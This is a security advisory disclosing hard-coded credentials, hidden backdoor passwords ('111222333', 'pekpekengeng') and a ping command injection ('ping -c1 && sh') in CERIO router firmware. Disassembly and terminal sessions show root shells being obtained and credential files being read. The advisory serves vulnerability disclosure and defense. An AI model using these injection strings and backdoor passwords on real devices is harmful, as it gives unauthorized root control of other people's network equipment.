CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities

Author: LiquidWorm Published: 2017-05-31 Verified: Verified



CERIO 11nbg 2.4Ghz High Power Wireless Router (pekcmd) Rootshell Backdoors
Vendor: CERIO Corporation
Product web page: http://www.cerio.com.tw
Affected version: DT-100G-N (fw: Cen-WR-G2H5 v1.0.6)
                  DT-300N (fw: Cen-CPE-N2H10A v1.0.14)
                  DT-300N (fw: Cen-CPE-N2H10A v1.1.6)
                  CW-300N (fw: Cen-CPE-N2H10A v1.0.22)
                  Kozumi? (fw: Cen-CPE-N5H5R v1.1.1)
Summary: CERIO's DT-300N A4 eXtreme Power 11n 2.4Ghz 2x2
High Power Wireless Access Point with built-in 10dBi
patch antennas and also supports broadband wireless
routing. DT-300N A4's wireless High Power design
enhances the range and stability of the device's
wireless signal in office and home environments.
Another key hardware function of DT-300N A4 is its PoE
Bridging feature, which allows subsequent devices to
be powered through DT-300N A4's LAN port. This
reduces device cabling and allows for more convenient
deployment. DT-300N A4 utilizes a 533Mhz high power CPU base
with 11n 2x2 transmission rates of 300Mbps. This
powerful device can produce high level performance
across multiple rooms or large spaces such as offices,
schools, businesses and residential areas. DT-300N A4
is suitable for both indoor and outdoor deployment,
and utilizes an IPX6 weatherproof housing.
The DT-300N A4 hardware equipped with to bundles
Cerio CenOS 5.0 Software Core. CenOS 5.0 devices can
use integrated management functions of Control
Access Point (CAP Mode) to manage an AP network.
Desc: Cerio Wireless Access Point and Router suffers from
several vulnerabilities including: hard-coded and default
credentials, information disclosure, command injection and
hidden backdoors that allows escaping the restricted shell
into a root shell via the 'pekcmd' binary. Given that all
the processes run as root, an attacker can easily drop into
the root shell with supplying hard-coded strings stored in
.rodata segment assigned as static constant variables. The
pekcmd shell has several hidden functionalities for enabling
an advanced menu and modifying MAC settings as well as easily
escapable regex function for shell characters.
Tested on: Cenwell Linux 802.11bgn MIMO Wireless AP(AR9341)
           RALINK(R) Cen-CPE-N5H2 (Access Point)
           CenOS 5.0/4.0/3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2017-5409
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5409.php
Large number of devices uses the cenwell firmware (mips arch)
which comes with few surprises.
Default credentials (web interface):
Default credentials (linux shell, ssh or telnet):
Contents of /etc/passwd (DES):
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd <---
The /bin/pekcmd binary is a restricted shell environment with
limited and customized set of commands that you can use for
administering the device once you've logged-in with the root:default
➜  ~ telnet
Connected to
Escape character is '^]'.
Login: root
Password: *******
command> help
Avaliable commands:
    info            Show system informations
    ping            Ping!
    clear           clear screen
    default         Set default and reboot
    passwd          Change root password
    reboot          Reboot
    ifconfig        IP Configuration
    iwconfig        Configure a WLAN interface
    iwpriv          Configure private parameters of a WLAN interface
    exit            Exit
    help            show this help
command> id
id: no such command
Analyzing the pekcmd binary revealed the hidden backdoors and the
hidden advanced menu. Here is the invalid characters check function:
.text:00401F60 check_shellchars:
.text:00401F60                 li      $gp, 0x1FB00
.text:00401F68                 addu    $gp, $t9
.text:00401F6C                 addiu   $sp, -0x38
.text:00401F70                 sw      $ra, 0x38+var_4($sp)
.text:00401F74                 sw      $s2, 0x38+var_8($sp)
.text:00401F78                 sw      $s1, 0x38+var_C($sp)
.text:00401F7C                 sw      $s0, 0x38+var_10($sp)
.text:00401F80                 sw      $gp, 0x38+var_28($sp)
.text:00401F84                 la      $a1, 0x410000
.text:00401F88                 la      $t9, memcpy
.text:00401F8C                 addiu   $s0, $sp, 0x38+var_20
.text:00401F90                 move    $s2, $a0
.text:00401F94                 addiu   $a1, (asc_409800 - 0x410000)  # ";><|$~*{}()"
.text:00401F98                 move    $a0, $s0         # dest
.text:00401F9C                 jalr    $t9 ; memcpy
.text:00401FA0                 li      $a2, 0xB         # n
.text:00401FA4                 lw      $gp, 0x38+var_28($sp)
.text:00401FA8                 b       loc_401FE4
.text:00401FAC                 addiu   $s1, $sp, 0x38+var_15
.text:00401FB0                 lb      $a1, 0($s0)      # c
.text:00401FB4                 jalr    $t9 ; strchr
.text:00401FB8                 addiu   $s0, 1
.text:00401FBC                 lw      $gp, 0x38+var_28($sp)
.text:00401FC0                 beqz    $v0, loc_401FE4
.text:00401FC4                 move    $a1, $v0
.text:00401FC8                 la      $a0, 0x410000
.text:00401FCC                 la      $t9, printf
.text:00401FD0                 nop
.text:00401FD4                 jalr    $t9 ; printf
.text:00401FD8                 addiu   $a0, (aIllegalArgumen - 0x410000)  # "illegal argument: %s\n"
.text:00401FDC                 b       loc_402000
.text:00401FE0                 nop
.text:00401FE4                 la      $t9, strchr
.text:00401FE8                 bne     $s0, $s1, loc_401FB0
.text:00401FEC                 move    $a0, $s2         # command
.text:00401FF0                 la      $t9, system
.text:00401FF4                 nop
.text:00401FF8                 jalr    $t9 ; system
.text:00401FFC                 nop
.text:00402000                 lw      $ra, 0x38+var_4($sp)
.text:00402004                 lw      $gp, 0x38+var_28($sp)
.text:00402008                 move    $v0, $zero
.text:0040200C                 lw      $s2, 0x38+var_8($sp)
.text:00402010                 lw      $s1, 0x38+var_C($sp)
.text:00402014                 lw      $s0, 0x38+var_10($sp)
.text:00402018                 jr      $ra
.text:0040201C                 addiu   $sp, 0x38
.text:0040201C  # End of function check_shellchars
command> ping -c 1 | id
illegal argument: | id
Escaping the restricted shell using Ping command injection:
command> ping -c1 && id
PING ( 56 data bytes
64 bytes from icmp_seq=0 ttl=64 time=0.3 ms
--- ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
uid=0(root) gid=0(root)
We can easily drop into a sh:
command> ping -c1 && sh
PING ( 56 data bytes
64 bytes from icmp_seq=0 ttl=64 time=0.3 ms
--- ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
BusyBox v1.11.2 (2014-07-29 12:05:26 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ # ls
bin      dev      etc_ro   lib      mount    pekcmd   reset    sys      tmpetc   tmpvar   var
cfg      etc      home     mnt      pek      proc     sbin     tmp      tmphome  usr
~ # cat /etc/passwd
~ # uname -a
Linux (none) 2.6.31--LSDK-9.2.0_U9.915 #9 Mon Aug 11 09:48:52 CST 2014 mips unknown
~ # cd etc
/etc # cat hostapd0.conf
/etc # cat version
Atheros/ Version 1.0.1 with AR7xxx --  三 2月 5 17:30:42 CST 2014
/etc # cd /home/httpd/cgi-bin
/home/httpd/cgi-bin # cat .htpasswd
/home/httpd/cgi/bin # cd /cfg
/cfg # ls -al
drwxr-xr-x    2 root     root            0 Jan  1 00:00 .
drwxr-xr-x   23 1000     1000          305 Feb  5  2014 ..
-rw-r--r--    1 root     root         7130 Jan  1 00:00 config
-rwxrwxrwx    1 root     root          427 Jan  1 00:00 rsa_host_key
-rwxrwxrwx    1 root     root          225 Jan  1 00:00 rsa_host_key.pub
-rw-r--r--    1 root     root           22 Jan  1 00:00 telnet.conf
/cfg # cat telnet.conf
/cfg # cat config |grep pass
Root_password "default"
Admin_password "admin"
/cfg # exit
The hidden 'art' command backdoor enabling root shell, calling system sh
using password: 111222333:
la      $a0, 0x410000
la      $t9, strcmp
addiu   $a1, $sp, 0xB8+var_A0  # s2
jalr    $t9 ; strcmp
addiu   $a0, (a111222333 - 0x410000)  # "111222333"
lw      $gp, 0xB8+var_A8($sp)
sltu    $s0, $zero, $v0
.text:004035D8 loc_4035D8:
.text:004035D8                 la      $a1, 0x410000
.text:004035DC                 la      $t9, strcpy
.text:004035E0                 addiu   $s0, $sp, 0xB8+var_8C
.text:004035E4                 addiu   $a1, (aArt - 0x410000)  # "ART"
.text:004035E8                 move    $a0, $s0         # dest
.text:004035EC                 sw      $zero, 0xB8+var_8C($sp)
.text:004035F0                 sw      $zero, 4($s0)
.text:004035F4                 sw      $zero, 8($s0)
.text:004035F8                 sw      $zero, 0xC($s0)
.text:004035FC                 jalr    $t9 ; strcpy
.text:00403600                 sw      $zero, 0x10($s0)
.text:00403604                 lw      $gp, 0xB8+var_A8($sp)
.text:00403608                 nop
.text:0040360C                 la      $t9, strlen
.text:00403610                 nop
.text:00403614                 jalr    $t9 ; strlen
.text:00403618                 move    $a0, $s0         # s
.text:0040361C                 lw      $gp, 0xB8+var_A8($sp)
.text:00403620                 move    $a3, $zero       # flags
.text:00403624                 addiu   $a2, $v0, 1      # n
.text:00403628                 la      $t9, send
.text:0040362C                 move    $a0, $s1         # fd
.text:00403630                 jalr    $t9 ; send
.text:00403634                 move    $a1, $s0         # buf
.text:00403638                 lw      $gp, 0xB8+var_A8($sp)
.text:0040363C                 move    $a1, $s0         # buf
.text:00403640                 li      $a2, 0x14        # nbytes
.text:00403644                 la      $t9, read
.text:00403648                 nop
.text:0040364C                 jalr    $t9 ; read
.text:00403650                 move    $a0, $s1         # fd
.text:00403654                 lw      $gp, 0xB8+var_A8($sp)
.text:00403658                 nop
.text:0040365C                 la      $t9, close
.text:00403660                 nop
.text:00403664                 jalr    $t9 ; close
.text:00403668                 move    $a0, $s1         # fd
.text:0040366C                 lw      $gp, 0xB8+var_A8($sp)
.text:00403670                 nop
.text:00403674                 la      $a0, 0x410000
.text:00403678                 la      $t9, puts
.text:0040367C                 nop
.text:00403680                 jalr    $t9 ; puts
.text:00403684                 addiu   $a0, (aEnterArtMode - 0x410000)  # "\n\n===>Enter ART Mode"
.text:00403688                 lw      $gp, 0xB8+var_A8($sp)
.text:0040368C                 nop
.text:00403690                 la      $v0, stdout
.text:00403694                 la      $t9, fflush
.text:00403698                 lw      $a0, (stdout - 0x41A000)($v0)  # stream
.text:0040369C                 jalr    $t9 ; fflush
.text:004036A0                 nop
.text:004036A4                 lw      $gp, 0xB8+var_A8($sp)
.text:004036A8                 nop
.text:004036AC                 la      $a0, 0x410000
.text:004036B0                 la      $t9, system
.text:004036B4                 addiu   $a0, (aSh - 0x410000)  # "sh"
command> art
Enter password
===>Enter ART Mode
BusyBox v1.11.2 (2014-07-28 12:48:51 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
The hidden 'pekpekengeng' backdoor enabling advanced commands
and access to root shell:
la      $v0, 0x420000
lw      $s0, (off_419A48 - 0x420000)($v0) # off_419A48 = "pekpekengeng"
jalr    $t9 ; strlen
move    $a0, $s0         # s
lw      $gp, 0x38+var_28($sp)
bne     $s3, $v0, loc_403350
move    $a0, $s5         # s1
la      $t9, strncmp
move    $a1, $s0         # s2
jalr    $t9 ; strncmp
move    $a2, $s3         # n
lw      $gp, 0x38+var_28($sp)
bnez    $v0, loc_403350
li      $v1, 1
la      $t9, printf
addiu   $a0, $s1, (aSNoSuchCommand - 0x410000)  # "%s: no such command\n"
jalr    $t9 ; printf
move    $a1, $s4
la      $a0, 0x410000
la      $t9, puts
jalr    $t9 ; puts
addiu   $a0, (aAdvancedComman - 0x410000)  # "\nAdvanced commands:"
lw      $gp, 0x28+var_18($sp)
la      $v0, 0x420000
addiu   $s0, $v0, (off_4199A8 - 0x420000)
la      $v0, 0x410000
b       loc_4020F8
addiu   $s1, $v0, (a16sS - 0x410000)  # "    %-16s%s\n"
command> help
Avaliable commands:
    info            Show system informations
    ping            Ping!
    clear           clear screen
    default         Set default and reboot
    passwd          Change root password
    reboot          Reboot
    ifconfig        IP Configuration
    iwconfig        Configure a WLAN interface
    iwpriv          Configure private parameters of a WLAN interface
    exit            Exit
    help            show this help
command> sh
sh: no such command
command> pekpekengeng
pekpekengeng: no such command
command> help
Avaliable commands:
    info            Show system informations
    ping            Ping!
    clear           clear screen
    default         Set default and reboot
    passwd          Change root password
    reboot          Reboot
    ifconfig        IP Configuration
    iwconfig        Configure a WLAN interface
    iwpriv          Configure private parameters of a WLAN interface
    exit            Exit
    help            show this help
Advanced commands:
    ifconfig        IP Configuration
    sh              root shell
    quit            Quit
command> sh
BusyBox v1.11.2 (2013-02-22 10:51:58 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ #
Other hidden functionalities:
command> unistorm
unistorm device mac count [interval] [len]
command> unistorm 1 2 3
target: 02:7f875b7c:2ab4a770:4007c4:2aac5010:00
ioctl SIOCGIFINDEX: No such devicecommand>
Serial connection password: 123456789
Hidden 'ate' mode:
.text:00401BB0 loc_401BB0:                              # CODE XREF: main+284j
.text:00401BB0                 la      $t9, lineedit_read_key
.text:00401BB4                 nop
.text:00401BB8                 jalr    $t9 ; lineedit_read_key
.text:00401BBC                 move    $a0, $s0
.text:00401BC0                 lw      $gp, 0xC8+var_B8($sp)
.text:00401BC4                 nop
.text:00401BC8                 la      $t9, lineedit_handle_byte
.text:00401BCC                 nop
.text:00401BD0                 jalr    $t9 ; lineedit_handle_byte
.text:00401BD4                 move    $a0, $v0
.text:00401BD8                 lw      $gp, 0xC8+var_B8($sp)
.text:00401BDC loc_401BDC:                              # CODE XREF: main+244j
.text:00401BDC                 lw      $v1, -0x634C($s1)
.text:00401BE0                 nop
.text:00401BE4                 slti    $v0, $v1, 3
.text:00401BE8                 bnez    $v0, loc_401BB0
.text:00401BEC                 li      $v0, 3
.text:00401BF0                 beq     $v1, $v0, loc_401D48
.text:00401BF4                 nop
.text:00401BF8                 la      $v0, 0x420000
.text:00401BFC                 nop
.text:00401C00                 lw      $v1, (dword_419CB8 - 0x420000)($v0)
.text:00401C04                 li      $v0, 1
.text:00401C08                 bne     $v1, $v0, loc_401C98
.text:00401C0C                 move    $a1, $zero
.text:00401C10                 la      $a0, 0x410000
.text:00401C14                 la      $t9, puts
.text:00401C18                 nop
.text:00401C1C                 jalr    $t9 ; puts
.text:00401C20                 addiu   $a0, (aAteMode - 0x410000)  # "ate mode"
.text:00401C24                 lw      $gp, 0xC8+var_B8($sp)
.text:00401C28                 nop
.text:00401C2C                 la      $v0, stdout
.text:00401C30                 la      $t9, fflush
.text:00401C34                 lw      $a0, (stdout - 0x41A000)($v0)  # stream
.text:00401C38                 jalr    $t9 ; fflush
.text:00401C3C                 nop
.text:00401C40                 lw      $gp, 0xC8+var_B8($sp)
.text:00401C44                 nop
.text:00401C48                 la      $t9, lineedit_back_term
.text:00401C4C                 nop
.text:00401C50                 jalr    $t9 ; lineedit_back_term
.text:00401C54                 nop
.text:00401C58                 lw      $gp, 0xC8+var_B8($sp)
.text:00401C5C                 nop
.text:00401C60                 la      $a0, 0x410000
.text:00401C64                 la      $t9, system
.text:00401C68                 nop
.text:00401C6C                 jalr    $t9 ; system
.text:00401C70                 addiu   $a0, (aSh - 0x410000)  # "sh"
.text:00401C74                 lw      $gp, 0xC8+var_B8($sp)
.text:00401C78                 nop
.text:00401C7C                 la      $t9, lineedit_set_term
.text:00401C80                 nop
.text:00401C84                 jalr    $t9 ; lineedit_set_term
.text:00401C88                 nop
.text:00401C8C                 lw      $gp, 0xC8+var_B8($sp)
.text:00401C90                 b       loc_401D48
.text:00401C94                 nop
Web server configuration information disclosure: